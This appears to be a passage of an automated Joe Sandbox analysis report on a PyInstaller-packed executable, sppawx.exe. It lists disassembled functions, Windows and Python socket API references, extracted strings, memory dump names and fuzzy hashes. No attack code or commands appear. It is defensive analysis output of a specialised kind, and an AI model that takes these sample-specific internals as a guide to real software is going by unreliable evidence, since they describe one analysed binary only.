Instruction Fuzzy Hash: 8211E921E0D14242F6A4EBBBE5492B9F251EB84784FC4417CEB4907B89CD2DD8D18224

Function 00007FF79A335B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A3317D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A331803

_get_daylight.LIBCMT ref: 00007FF79A335CA4
_get_daylight.LIBCMT ref: 00007FF79A335CB5

Strings

?, xrefs: 00007FF79A335C35

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 9b0d6ec61e2f200a216c3a4e1c6f7b63006c807f338435d4fb72607c3c5f3780
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: 5341E512E0E6824AFB74AB359401379F690EB80BA8FD4427DEE5C06ED5DE3CD441C710

Function 00007FF79A329084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3290B6

Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79A31CC15), ref: 00007FF79A3290D4

Strings

C:\Users\user\Desktop\sppawx.exe, xrefs: 00007FF79A3290C2

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\sppawx.exe
API String ID: 3580290477-2372293429
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: f3b8e03180fc3f0568613b12359a417318771e9c3ad5632761333a91334faff2
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: 9A415B32A0AB1686FB64EF36A8810B8B794EB44790B95507DED4D43B85DE3CE481C360

Function 00007FF79A32CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF79A32CDBF
GetLastError.KERNEL32 ref: 00007FF79A32CDE1

Strings

U, xrefs: 00007FF79A32CD6B

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 56927b0d103b8bcfc167e0774e2848b129515644c4a115c5d3f743e5f2fec9f7
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: ED419322B19B8581EB609F35E8443A9B7A0FB98794F844039EE4D87B98EF3CD411C750

Function 00007FF79A32F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF79A32F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF79A32F6BA

Strings

:, xrefs: 00007FF79A32F67E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: 4e1fd81dc36432723768758053b2140e424b0c93bad1eb94ad0a12165e789b89
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: EB21E163A0928182FB70AB31D04826DF3B1FB88B48FD5807DDA8D43694DF7CE9558B60

Function 00007FF79A31FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF79A31FE08
RaiseException.KERNEL32 ref: 00007FF79A31FE49

Strings

csm, xrefs: 00007FF79A31FE36

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: b840087720e8b2518e63abfa82fb4efe4917aad8864f4536ad74be85905c2eba
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 44115B32A09B8182EB20DF25F400269B7E0FB88B84F984279EE8D07769DF3CD551CB10

Function 00007FF79A3307AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3307DC
GetDriveTypeW.KERNEL32 ref: 00007FF79A33081C

Strings

:, xrefs: 00007FF79A330805

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 661e98d332bd1102e4b862f825f9ff25bf39f272a3d811e7275bb2396d4bd79c
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 2D017C22E1E20296F730BF70946627EB3A0EF85708FC0107EE95D86695DE2CE544CA24

Analysis Process: sppawx.exePID: 7860, Parent PID: 7808COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	954
Total number of Limit Nodes:	83

Executed Functions

Function 00007FFEDD271220 Relevance: 342.5, APIs: 2, Strings: 193, Instructions: 1225networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFEDD271258
00007FFEDDCCF380.PYTHON312 ref: 00007FFEDD27126D

Strings

SOL_SOCKET, xrefs: 00007FFEDD271AF0
NI_NOFQDN, xrefs: 00007FFEDD2726BD
IPPROTO_TCP, xrefs: 00007FFEDD271C34
IPPROTO_IGMP, xrefs: 00007FFEDD271BBC
AF_APPLETALK, xrefs: 00007FFEDD271476
INADDR_ALLHOSTS_GROUP, xrefs: 00007FFEDD271FD3
_socket.CAPI, xrefs: 00007FFEDD2713D4
IPPROTO_DSTOPTS, xrefs: 00007FFEDD271D9C
IPPROTO_GGP, xrefs: 00007FFEDD271BDA
IPPROTO_NONE, xrefs: 00007FFEDD271D7E
IPPROTO_UDP, xrefs: 00007FFEDD271C8E
IPPROTO_ND, xrefs: 00007FFEDD271CCA
MSG_CTRUNC, xrefs: 00007FFEDD271A5A
BDADDR_LOCAL, xrefs: 00007FFEDD2716F7
INADDR_NONE, xrefs: 00007FFEDD27200F
EAI_FAIL, xrefs: 00007FFEDD2724DD
IPPROTO_PUP, xrefs: 00007FFEDD271C70
IPPROTO_ESP, xrefs: 00007FFEDD271D24
INADDR_ANY, xrefs: 00007FFEDD271F5B
MSG_BCAST, xrefs: 00007FFEDD271AB4
IP_MULTICAST_IF, xrefs: 00007FFEDD2720E1
WSAStartup failed: network not ready, xrefs: 00007FFEDD2739CA
MSG_OOB, xrefs: 00007FFEDD2719E2
SO_ERROR, xrefs: 00007FFEDD271988
SO_USELOOPBACK, xrefs: 00007FFEDD27187A
IPPROTO_IPV6, xrefs: 00007FFEDD271C16
herror, xrefs: 00007FFEDD2712A9
SO_BROADCAST, xrefs: 00007FFEDD27185C
FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF, xrefs: 00007FFEDD271616
SOL_IP, xrefs: 00007FFEDD271B0E
INADDR_MAX_LOCAL_GROUP, xrefs: 00007FFEDD271FF1
IPPROTO_L2TP, xrefs: 00007FFEDD271EE6
00:00:00:FF:FF:FF, xrefs: 00007FFEDD2716ED
MSG_ERRQUEUE, xrefs: 00007FFEDD271A96
IPPROTO_MAX, xrefs: 00007FFEDD271E14
IP_TOS, xrefs: 00007FFEDD272069
EAI_NONAME, xrefs: 00007FFEDD272555
NI_NUMERICSERV, xrefs: 00007FFEDD272717
SOL_TCP, xrefs: 00007FFEDD271B2C
EAI_FAMILY, xrefs: 00007FFEDD2724FB
SO_SNDTIMEO, xrefs: 00007FFEDD27194C
AI_ADDRCONFIG, xrefs: 00007FFEDD272645
SIO_RCVALL, xrefs: 00007FFEDD2727A4
AI_PASSIVE, xrefs: 00007FFEDD2725AF
IPPROTO_FRAGMENT, xrefs: 00007FFEDD271D06
AF_SNA, xrefs: 00007FFEDD2714EE
IP_HDRINCL, xrefs: 00007FFEDD27204B
IPPROTO_SCTP, xrefs: 00007FFEDD271DD8, 00007FFEDD271F04
IPPROTO_EGP, xrefs: 00007FFEDD271C52
SO_REUSEADDR, xrefs: 00007FFEDD2717E4
IPV6_V6ONLY, xrefs: 00007FFEDD2722C1
timeout, xrefs: 00007FFEDD27132C
90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD, xrefs: 00007FFEDD271635
SO_DONTROUTE, xrefs: 00007FFEDD27183E
TCP_MAXSEG, xrefs: 00007FFEDD27240B
HV_GUID_WILDCARD, xrefs: 00007FFEDD271601
IPV6_HOPLIMIT, xrefs: 00007FFEDD27231B
SO_RCVTIMEO, xrefs: 00007FFEDD27196A
HV_GUID_ZERO, xrefs: 00007FFEDD2715E2
HVSOCKET_ADDRESS_FLAG_PASSTHRU, xrefs: 00007FFEDD2715C0
RCVALL_SOCKETLEVELONLY, xrefs: 00007FFEDD27288F
EAI_AGAIN, xrefs: 00007FFEDD2724A1
IP_DROP_SOURCE_MEMBERSHIP, xrefs: 00007FFEDD2721EF
IPV6_CHECKSUM, xrefs: 00007FFEDD2722DF
AF_HYPERV, xrefs: 00007FFEDD27152A
IPV6_MULTICAST_IF, xrefs: 00007FFEDD272267
IPPROTO_PGM, xrefs: 00007FFEDD271EC8
IPV6_MULTICAST_LOOP, xrefs: 00007FFEDD272285
INADDR_BROADCAST, xrefs: 00007FFEDD271F79
IP_ADD_MEMBERSHIP, xrefs: 00007FFEDD27213B
SHUT_RDWR, xrefs: 00007FFEDD27278C
HV_GUID_LOOPBACK, xrefs: 00007FFEDD27165E
INADDR_LOOPBACK, xrefs: 00007FFEDD271F97
IPV6_RTHDR, xrefs: 00007FFEDD2723B1
IP_RECVTOS, xrefs: 00007FFEDD2720A5
AF_INET6, xrefs: 00007FFEDD271494
AF_IRDA, xrefs: 00007FFEDD27150C
EAI_BADFLAGS, xrefs: 00007FFEDD2724BF
WSAStartup failed: error code %d, xrefs: 00007FFEDD2739B1
socket.herror, xrefs: 00007FFEDD271277
AI_V4MAPPED, xrefs: 00007FFEDD272663
WSAStartup failed: requested version not supported, xrefs: 00007FFEDD2739D3
IPPROTO_IPV4, xrefs: 00007FFEDD271BF8
IPPROTO_AH, xrefs: 00007FFEDD271D42
IPPROTO_ICLFXBM, xrefs: 00007FFEDD271E32
IPV6_HOPOPTS, xrefs: 00007FFEDD272339
error, xrefs: 00007FFEDD27130A
HV_GUID_CHILDREN, xrefs: 00007FFEDD27163F
AI_NUMERICSERV, xrefs: 00007FFEDD272609
IPPROTO_IDP, xrefs: 00007FFEDD271CAC
HVSOCKET_CONNECTED_SUSPEND, xrefs: 00007FFEDD2715A2
AI_ALL, xrefs: 00007FFEDD272627
E0E16197-DD56-4A10-9195-5EE7A155A838, xrefs: 00007FFEDD271654
SOCK_RAW, xrefs: 00007FFEDD27174E
SIO_KEEPALIVE_VALS, xrefs: 00007FFEDD2727C6
RCVALL_MAX, xrefs: 00007FFEDD2728A9
SHUT_WR, xrefs: 00007FFEDD27276E
SO_TYPE, xrefs: 00007FFEDD2719A6
TCP_FASTOPEN, xrefs: 00007FFEDD272483
IPPROTO_RDP, xrefs: 00007FFEDD271EAA
IP_ADD_SOURCE_MEMBERSHIP, xrefs: 00007FFEDD2721D1
IPPROTO_CBT, xrefs: 00007FFEDD271E6E
RCVALL_ON, xrefs: 00007FFEDD272875
A42E7CDA-D03F-480C-9CC2-A4DE20ABB878, xrefs: 00007FFEDD271673
MSG_WAITALL, xrefs: 00007FFEDD271A78
IP_DROP_MEMBERSHIP, xrefs: 00007FFEDD272159
MSG_PEEK, xrefs: 00007FFEDD271A00
IPPORT_RESERVED, xrefs: 00007FFEDD271F22
SO_SNDLOWAT, xrefs: 00007FFEDD271910
IPV6_RECVRTHDR, xrefs: 00007FFEDD272375
IPV6_JOIN_GROUP, xrefs: 00007FFEDD27220D
IPV6_DONTFRAG, xrefs: 00007FFEDD2722FD
SocketType, xrefs: 00007FFEDD27136B
IP_RECVDSTADDR, xrefs: 00007FFEDD2720C3
IPV6_TCLASS, xrefs: 00007FFEDD2723CF
IP_MULTICAST_LOOP, xrefs: 00007FFEDD27211D
NI_MAXHOST, xrefs: 00007FFEDD272681
IP_MULTICAST_TTL, xrefs: 00007FFEDD2720FF
TCP_KEEPINTVL, xrefs: 00007FFEDD272447
IPPROTO_RAW, xrefs: 00007FFEDD271DF6
NI_DGRAM, xrefs: 00007FFEDD272735
AF_DECnet, xrefs: 00007FFEDD2714B2
NI_NAMEREQD, xrefs: 00007FFEDD2726F9
IP_PKTINFO, xrefs: 00007FFEDD272177
SHUT_RD, xrefs: 00007FFEDD272750
NI_MAXSERV, xrefs: 00007FFEDD27269F
SOCK_STREAM, xrefs: 00007FFEDD271712
EAI_NODATA, xrefs: 00007FFEDD272537
SOCK_SEQPACKET, xrefs: 00007FFEDD27176C
SO_RCVLOWAT, xrefs: 00007FFEDD27192E
AF_LINK, xrefs: 00007FFEDD2714D0
IPV6_UNICAST_HOPS, xrefs: 00007FFEDD2722A3
IPPROTO_ST, xrefs: 00007FFEDD271E50
MSG_DONTROUTE, xrefs: 00007FFEDD271A1E
SOMAXCONN, xrefs: 00007FFEDD2719C4
EAI_MEMORY, xrefs: 00007FFEDD272519
00:00:00:00:00:00, xrefs: 00007FFEDD2716CE
HVSOCKET_CONNECT_TIMEOUT_MAX, xrefs: 00007FFEDD271584
AF_UNSPEC, xrefs: 00007FFEDD27141C
SOL_UDP, xrefs: 00007FFEDD271B4A
AI_CANONNAME, xrefs: 00007FFEDD2725CD
SO_DEBUG, xrefs: 00007FFEDD2717A8
AF_INET, xrefs: 00007FFEDD27143A
has_ipv6, xrefs: 00007FFEDD27139E
BTPROTO_RFCOMM, xrefs: 00007FFEDD2716B6
HVSOCKET_CONNECT_TIMEOUT, xrefs: 00007FFEDD271566
IP_UNBLOCK_SOURCE, xrefs: 00007FFEDD272195
SO_EXCLUSIVEADDRUSE, xrefs: 00007FFEDD271802
gaierror, xrefs: 00007FFEDD2712EB
IPPROTO_ICMPV6, xrefs: 00007FFEDD271D60
AI_NUMERICHOST, xrefs: 00007FFEDD2725EB
IPPROTO_ROUTING, xrefs: 00007FFEDD271CE8
IPPROTO_PIM, xrefs: 00007FFEDD271DBA
SO_OOBINLINE, xrefs: 00007FFEDD2718B6
IP_OPTIONS, xrefs: 00007FFEDD27202D
EAI_SERVICE, xrefs: 00007FFEDD272573
HV_PROTOCOL_RAW, xrefs: 00007FFEDD271548
HV_GUID_PARENT, xrefs: 00007FFEDD27167D
AF_BLUETOOTH, xrefs: 00007FFEDD271698
SO_LINGER, xrefs: 00007FFEDD271898
TCP_KEEPCNT, xrefs: 00007FFEDD272465
NI_NUMERICHOST, xrefs: 00007FFEDD2726DB
TCP_KEEPIDLE, xrefs: 00007FFEDD272429
AF_IPX, xrefs: 00007FFEDD271458
IP_BLOCK_SOURCE, xrefs: 00007FFEDD2721B3
SIO_LOOPBACK_FAST_PATH, xrefs: 00007FFEDD2727E8
BDADDR_ANY, xrefs: 00007FFEDD2716D8
HV_GUID_BROADCAST, xrefs: 00007FFEDD271620
SOCK_RDM, xrefs: 00007FFEDD27178A
IPPORT_USERRESERVED, xrefs: 00007FFEDD271F40
INADDR_UNSPEC_GROUP, xrefs: 00007FFEDD271FB5
IPV6_MULTICAST_HOPS, xrefs: 00007FFEDD272249
IPPROTO_HOPOPTS, xrefs: 00007FFEDD271B80
EAI_SOCKTYPE, xrefs: 00007FFEDD272591
IPPROTO_IP, xrefs: 00007FFEDD271B65
IPV6_RECVTCLASS, xrefs: 00007FFEDD272393
IPPROTO_ICMP, xrefs: 00007FFEDD271B9E
IPV6_LEAVE_GROUP, xrefs: 00007FFEDD27222B
RCVALL_OFF, xrefs: 00007FFEDD272857
MSG_TRUNC, xrefs: 00007FFEDD271A3C
TCP_NODELAY, xrefs: 00007FFEDD2723ED
socket.gaierror, xrefs: 00007FFEDD2712C8
IPV6_PKTINFO, xrefs: 00007FFEDD272357
SO_RCVBUF, xrefs: 00007FFEDD2718F2
SOCK_DGRAM, xrefs: 00007FFEDD271730
SO_ACCEPTCONN, xrefs: 00007FFEDD2717C6
SO_KEEPALIVE, xrefs: 00007FFEDD271820
IPPROTO_IGP, xrefs: 00007FFEDD271E8C
IP_TTL, xrefs: 00007FFEDD272087
SO_SNDBUF, xrefs: 00007FFEDD2718D4
00000000-0000-0000-0000-000000000000, xrefs: 00007FFEDD2715D8, 00007FFEDD2715F7
CAPI, xrefs: 00007FFEDD2713F0
MSG_MCAST, xrefs: 00007FFEDD271AD2

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: 00007F380Startup
String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
API String ID: 106476611-1188461360
Opcode ID: 0aedc31c3f32929b62878f280f06a405182aa824222a02ced28cf02c4fa19bcf
Instruction ID: ad890c62f1dc0f8ca6c86992a0937b892f463a99c539947d91709f13ec5e616b
Opcode Fuzzy Hash: 0aedc31c3f32929b62878f280f06a405182aa824222a02ced28cf02c4fa19bcf
Instruction Fuzzy Hash: 8BC2C760F18763A1F630DB26AC146AD2775BF86BE1F485437C90E86A74FE6EE205D310

Function 00007FF79A311000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pkg, xrefs: 00007FF79A3139BE
VCRUNTIME140.dll, xrefs: 00007FF79A313DB1
pyi-disable-windowed-traceback, xrefs: 00007FF79A313BB2
bye-runtime-tmpdir, xrefs: 00007FF79A313B68
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF79A313B32
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF79A313A17, 00007FF79A313A2F, 00007FF79A313A9B
Failed to convert DLL search path!, xrefs: 00007FF79A313DDC
Py_GIL_DISABLED, xrefs: 00007FF79A313AF4
_PYI_SPLASH_IPC, xrefs: 00007FF79A313A23, 00007FF79A313EF5
Failed to remove temporary directory: %s, xrefs: 00007FF79A313FC3
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF79A313EBB
_PYI_ARCHIVE_FILE, xrefs: 00007FF79A3138D2, 00007FF79A3139FF
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF79A313E0A
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF79A313C61
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF79A313D12
Failed to load splash screen resources!, xrefs: 00007FF79A313E85
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF79A313D35
Failed to start splash screen!, xrefs: 00007FF79A313ED4
MEI, xrefs: 00007FF79A313933
